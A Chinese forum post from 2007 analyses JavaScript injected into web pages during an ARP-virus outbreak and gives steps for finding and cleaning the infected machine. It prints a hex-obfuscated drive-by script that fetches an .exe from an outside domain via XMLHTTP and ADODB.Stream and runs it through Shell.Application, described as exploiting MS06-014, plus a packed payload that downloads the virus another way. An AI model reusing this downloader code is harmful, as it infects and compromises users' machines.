解析arp病毒背后利用的Javascript技术附解密方法

最近公司的网络中了这两天闹的很欢的ARP病毒，导致大家都无法上网，给工作带来了很大的不方便，在这里写下杀毒的过程，希望对大家能有帮助！

现象：打开部分网页显示为乱码，好像是随机的行为，但是看似又不是，因为它一直在监视msn.com，呵呵，可能和微软有仇吧，继续查看源代码，发现头部有一个js文件链接----；

来源：经过一番网络搜索，发现这个域名是印度域名，而IP地址却是美国的，而且域名的注册日期是7月25日，看来一切都是预谋好了的，还是不管这个了，先解决问题吧；

分析：
1、先把（http://9-6.in/n.js）这个JS文件下载下来，代码如下：

document.writeln("");
document.writeln("");
document.writeln("")
其中第一句window.onerror=function(){returntrue;}就先把JS错误屏蔽掉，真够狠的，呵呵，不这样怎么隐藏自己呢，哈哈！然后还有个JS文件http://9-6.in/S368/NewJs2.js，先继续往下看，找到StartRun();运行一个函数，函数的主要作用是写COOKIE，日期为保存一天，然后还用隐藏框架加载了一个文件（http://9-6.IN/s368/T368.htm），其余就没有什么特别的了；
2、下载（http://9-6.in/S368/NewJs2.js）这个文件，代码如下：

StrInfo="x3cx73x63x72x69x70x74x3ex77x69x6ex64x6fx77x2ex6fx6ex65x72x72x6fx72x3dx66x75x6ex63x74x69x6fx6ex28x29x7bx72x65x74x75x72x6ex74x72x75x65x3bx7dx3cx2fx73x63x72x69x70x74x3e"+"n"+
"x3cx73x63x72x69x70x74x3e"+"n"+
"x44x5ax3d'x78x36x38x78x37x34x78x37x34x78x37x30x78x33x41x78x32x46x78x32x46x78x33x39x78x32x44x78x33x36x78x32x45x78x36x39x78x36x45x78x32x46x78x35x33x78x33x33x78x33x36x78x33x38x78x32x46x78x35x33x78x33x33x78x33x36x78x33x38x78x32x45x78x36x35x78x37x38x78x36x35'x3b"+"n"+
"x4ex6fx73x6bx73x6cx61x3d''x3b"+"n"+
"x66x75x6ex63x74x69x6fx6ex47x6ex4dx73x28x6ex29"+"n"+
"x7b"+"n"+
"x76x61x72x6ex75x6dx62x65x72x4dx73x3dx4dx61x74x68x2ex72x61x6ex64x6fx6dx28x29x2ax6ex3b"+"n"+
"x72x65x74x75x72x6e'x78x37x45x78x35x34x78x36x35x78x36x44x78x37x30'x2bx4dx61x74x68x2ex72x6fx75x6ex64x28x6ex75x6dx62x65x72x4dx73x29x2b'x78x32x45x78x37x34x78x36x44x78x37x30'x3b"+"n"+
"x7d"+"n"+
"x74x72x79"+"n"+
"x7b"+"n"+
"x4ex6fx73x6bx73x6cx61x3d''x3b"+"n"+
"x76x61x72x42x66x3dx64x6fx63x75x6dx65x6ex74x2ex63x72x65x61x74x65x45x6cx65x6dx65x6ex74x28"x78x36x46x78x36x32x78x36x41x78x36x35x78x36x33x78x37x34"x29x3b"+"n"+
"x42x66x2ex73x65x74x41x74x74x72x69x62x75x74x65x28"x78x36x33x78x36x43x78x36x31x78x37x33x78x37x33x78x36x39x78x36x34"x2c"x78x36x33x78x36x43x78x37x33x78x36x39x78x36x34x78x33x41x78x34x32x78x34x34x78x33x39x78x33x36x78x34x33x78x33x35x78x33x35x78x33x36x78x32x44x78x33x36x78x33x35x78x34x31x78x33x33x78x32x44x78x33x31x78x33x31x78x34x34x78x33x30x78x32x44x78x33x39x78x33x38x78x33x33x78x34x31x78x32x44x78x33x30x78x33x30x78x34x33x78x33x30x78x33x34x78x34x36x78x34x33x78x33x32x78x33x39x78x34x35x78x33x33x78x33x36"x29x3b"+"n"+
"x76x61x72x4bx78x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"x78x34x44x78x36x39x78x36x33x78x37x32x78x36x46x78x37x33x78x36x46x78x36x36x78x37x34x78x32x45x78x35x38"x2b"x78x34x44x78x34x43x78x34x38x78x35x34x78x35x34x78x35x30"x2c""x29x3b"+"n"+
"x76x61x72x41x53x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"x78x34x31x78x36x34x78x36x46x78x36x34x78x36x32x78x32x45x78x35x33x78x37x34x78x37x32x78x36x35x78x36x31x78x36x44"x2c""x29x3b"+"n"+
"x4ex6fx73x6bx73x6cx61x3d''x3b"+"n"+
"x41x53x2ex74x79x70x65x3dx31x3b"+"n"+
"x4ex6fx73x6bx73x6cx61x3d''x3b"+"n"+
"x4bx78x2ex6fx70x65x6ex28"x78x34x37x78x34x35x78x35x34"x2cx44x5ax2cx30x29x3b"+"n"+
"x4ex6fx73x6bx73x6cx61x3d''x3b"+"n"+
"x4bx78x2ex73x65x6ex64x28x29x3b"+"n"+
"x4ex6fx73x6bx73x6cx61x3d''x3b"+"n"+
"x4ex73x31x3dx47x6ex4dx73x28x39x39x39x39x29x3b"+"n"+
"x4ex6fx73x6bx73x6cx61x3d''x3b"+"n"+
"x76x61x72x63x46x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"x78x35x33x78x36x33x78x37x32x78x36x39x78x37x30x78x37x34x78x36x39x78x36x45x78x36x37x78x32x45x78x34x36x78x36x39x78x36x43x78x36x35x78x35x33x78x37x39x78x37x33x78x37x34x78x36x35x78x36x44x78x34x46x78x36x32x78x36x41x78x36x35x78x36x33x78x37x34"x2c""x29x3b"+"n"+
"x76x61x72x4ex73x54x6dx70x3dx63x46x2ex47x65x74x53x70x65x63x69x61x6cx46x6fx6cx64x65x72x28x30x29x3bx4ex73x31x3dx63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2cx4ex73x31x29x3bx41x53x2ex4fx70x65x6ex28x29x3bx41x53x2ex57x72x69x74x65x28x4bx78x2ex72x65x73x70x6fx6ex73x65x42x6fx64x79x29x3b"+"n"+
"x41x53x2ex53x61x76x65x54x6fx46x69x6cx65x28x4ex73x31x2cx32x29x3bx41x53x2ex43x6cx6fx73x65x28x29x3bx76x61x72x71x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"x78x35x33x78x36x38x78x36x35x78x36x43x78x36x43x78x32x45x78x34x31x78x37x30x78x37x30x78x36x43x78x36x39x78x36x33x78x36x31x78x37x34x78x36x39x78x36x46x78x36x45"x2c""x29x3b"+"n"+
"x6fx6bx31x3dx63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2b'x78x35x43x78x35x43x78x37x33x78x37x39x78x37x33x78x37x34x78x36x35x78x36x44x78x33x33x78x33x32'x2c'x78x36x33x78x36x44x78x36x34x78x32x45x78x36x35x78x37x38x78x36x35'x29x3b"+"n"+
"x71x2ex53x48x65x4cx4cx45x78x65x63x75x74x65x28x6fx6bx31x2c'x78x32x30x78x32x46x78x36x33'x2bx4ex73x31x2c""x2c"x78x36x46x78x37x30x78x36x35x78x36x45"x2cx30x29x3b"+"n"+
"x4ex6fx73x6bx73x6cx61x3d''x3b"+"n"+
"x7d"+"n"+
"x63x61x74x63x68x28x4dx73x49x29x7bx4dx73x49x3dx31x3bx7d"+"n"+
"x4ex6fx73x6bx73x6cx61x3d''x3b"+"n"+
"x3cx2fx73x63x72x69x70x74x3e"
window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65"](StrInfo);
这个代码有点长哦，而且有保护措施，全部转换为十六进制，不过不要害怕，我们有办法解决，首先得确保你已经安装了UE，然后打开UE，把代码粘贴进去（废话，呵呵），把x替换为%，然后用html代码转换功能，解码，就可以得到第一次解码的代码，第一次？？？，呵呵，这个代码的作者很变态的，做了两次编码，所以我得进行两次解码才行，重复刚才的步骤，然后你就可以看到最终的“原始”代码了；
具体的代码我就不帖出来了，有一定的危害性，相信大家看了上面的步骤都能自己找到代码，这里之说一下比较核心的代码吧；

[Copytoclipboard][-]CODE:
//核心代码
..............
"varBf=document.createElement("object");"+"n"+
"Bf.setAttribute("classid","clsid:BD96C556-65A3-11D-983A-C4FC29E36");"+"n"+
"varKx=Bf.CreateObject("Microsoft.X"+"MLHTTP","");"+"n"+
"varAS=Bf.CreateObject("Adodb.Stream","");"+"n"+
.............
"varcF=Bf.CreateObject("Scripting.FileSystemObject","");"+"n"+
"varNsTmp=cF.GetSpecialFolder(0);Ns1=cF.BuildPath(NsTmp,Ns1);AS.Open();AS.Write(Kx.responseBody);"+"n"+
"AS.SaveToFile(Ns1,2);AS.Close();varq=Bf.CreateObject("Shell.Application","");"+"n"+
"ok1=cF.BuildPath(NsTmp+'system32','cmd.exe');"+"n"+
"q.SHeLLExecute(ok1,'/c'+Ns1,"","open",0);"+"n"+
..............
上面的就是最为核心的代码，利用MS0614漏洞、创建JS异步对象获取病毒（*.exe）文件，然后运行，这样就达到它的目的啦！
3、打开http://9-6.IN/s368/T368.htm查看源代码，又发现一段怪异的JS文件，如下：

[Copytoclipboard][-]CODE:

本帖最近评分记录
bound02007-8-619:01威望+1鼓励研究精神！:D

引用报告回复心中有梦
[广告]【万网邮箱DIY，灵活购买】|西部数码多线虚拟主机全国10强

veking[楼主]

蓝色水
高级会员

帖子275
体力733
威望1
注册2005-6-16
#2发表于2007-8-616:06资料短消息加为好友
解析arp病毒背后利用的Javascript技术

可以看出这段代码也是经过加密的了，特征为function(p,a,c,k,e,d)，这种加密方法网上有很多例子，我就不细说了，附上解密代码：

[Copytoclipboard][-]CODE:
//以下代码为网上搜索所得，版权归原作者所有

经过解密后代码为：

[Copytoclipboard][-]CODE:
info=""
document.write(info)
继续打开这个表面象图片的链接，呵呵，当然不会是MM图片了，查看源代码，找到如下代码：

[Copytoclipboard][-]CODE:
eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){returnr[e]}];e=function(){return'w+'};c=1};while(c--)if(k[c])p=p.replace(newRegExp('b'+e(c)+'b','g'),k[c]);returnp}('En=1c;1213(){}1214(){1d{n=1e1f("Klr8i36j36o369C3sKlr8i369x")}1g(e){Q}Ea=n["1534pd8m7k"]("w847o76rf","R7q3v54l","");1h(a["78i3yLm"]("zfl4593y3")!=-1){Q}Eb=n["1534j36o36v54l"]();b=b["frsf46"](0,2);b+="v6dk65JxKlr8i3Jx1i3sKlr8i36A6dm7q3frf36hd8m7k9787";n["j34p5qqs5h1jF846D"](1k,13);Ec=n["wiip543kd6D"]("7");Ec=n["wiip543kd6D"]("5");Ec=n["wiip543kd6D"]("s");Ec=n["wiip543kd6D"]("h");Ec=n["wiip543kd6D"]("i");n["j34pd8m7k"]("j5o3v54l","7","Sfh67A416o56fG83Cwh47o3NLsT3h4t"Cfh67A49fl3qq"ugo56dG83Cwh47o3NLsT3h4t"fl3qq95AAq7h547d8"ugo565BsBhBiB3BmBkg");n["j34pd8m7k"]("j5o3v54l","5","Hgf9Ur8t"pVv6dk65JxI84368JxIFNv17LUF9FNFl44A1lOOh1mxW718OjX191aOi1nC18YYWl4Y1o"BHBHugf9Ur8t"hzi93y3Zh4633hVZm"BHBxug");n["j34pd8m7k"]("j5o3v54l","s","f9jA3h75qRdqi36ft"1pD1qdhrz384f"ugsGs9frsf4678ktHBs9q5f4I8i3yLmt""uugsPG"qdh5qfJxK3zAd6Jxpd843849IF1r"g");n["j34pd8m7k"]("j5o3v54l","h","d91s5z3jA5h3tsugmd6t5GHg5Sh9I43zftu9pdr84g5PPu10o56mGh9I43zftu9I43zt5u9v54lgmPG"jX191a1b1tx1uW3y3"g");n["j34pd8m7k"]("j5o3v54l","i","Hg46D10f9Fy3htmug11h54hlt3u1011g11C78idC9hqdf3tugSZfh67A416");n["j34pd8m7k"]("w847o76rf","v6d43h4","x");n["j34pd8m7k"]("w847o76rf","R7q3v54l","hVC78idCffDf43zX1bzfl4593y3");n["j34pd8m7k"]("w847o76rf","v565z3436",b);n["j34pd8m7k"]("w847o76rf","Fy4177f4","9656g9M7Ag93y3g9idhg9hdzg9s78g9kMg9Mg9456g956Tg9qMlg9f74g9l1vyg94kMg9iqqg9dhyg9osyg");n["j34pd8m7k"]("w847o76rf","1wf36j34","x");Q}14();',62,95,'|||x65|x74|x61|x72|x69|x6e|x2e||||x6f||x73|x3b|x63|x64|x53|x67|x68|x66|odks63ls|x76|x43|x6c|x75|x62|x28|x29|x50|x41|x31|x78|x6d|x70|x2c|x77|x79|var|x45|x3d|x30|x49|x7e|x54|x4f|x7a|x58|x2F|x2b|return|x46|x3c|x6a|x52|x3a|x2E|x33|x6D|x2f|x7b|x7d|function|assort_panel_enabled|pslcdkc|x47|x3e|x4c|x6E|x36|x38|x32|null|try|new|ActiveXObject|catch|if|x57|x6b|106|x3A|x6B|x6F|x6C|x4d|x44|x35|x4e|x5B|x5D|x71|x55'.split('|'),0,{}))
又是好长的代码，又发现了function(p,a,c,k,e,r)，继续解码，代码很长，请大家自己解码查看吧，这里应用的还是上面的手法，用加密函数加密，然后转换为十六进制，尽最大努力混淆我们的视线，来达到不可告人的目的，这里的代码的主要作用是用另外一种方法下载病毒并运行，思想真的很先进，居然是去调用Web迅雷来下载病毒，然后去运行，作者真的是煞费苦心啊，应用了两种方法下载病毒，“小样，就不信毒不倒你１，呵呵
杀毒：说了半天只是分析了一下ARP病毒发作的时候在干什么，下面就说下关于杀毒的问题，其实现在网上有很多这方面的相关教程，我就简单总结一下我的杀毒过程吧；
1、中了arp病毒必须要先找到中毒的机器
2、给这个机器断网、杀毒
3、恢复局域网
其中第一步最关键了，如何才能找到呢？
在局域网随便一台客户机上打开网上邻居，查看工作组计算机，然后等到列表刷新出来后，迅速点击开始-->运行-->cmd-->arp-a回车，如果机器比较多，请多输入几次arp-a，然后仔细查看，你会发现有一台机器的Mac地址和网关的Mac地址相同，恭喜你，这就是那个毒源！
到这台机器的跟前（呵呵，废话真多），剩下的工作相信大家都有很多经验了吧，杀毒！装杀毒软件或者进安全模式更甚者重装机器，总之把病毒干掉就行了；
最后，到不能打开网页的机器上执行这个命令：点击开始-->运行-->cmd-->arp-d回车，然后就可以了。、

终于一切又恢复了平静，是不是很有成就感呢，呵呵！

本人的第一篇正式的BLOG技术文章终于写完了，希望大家能喜欢看！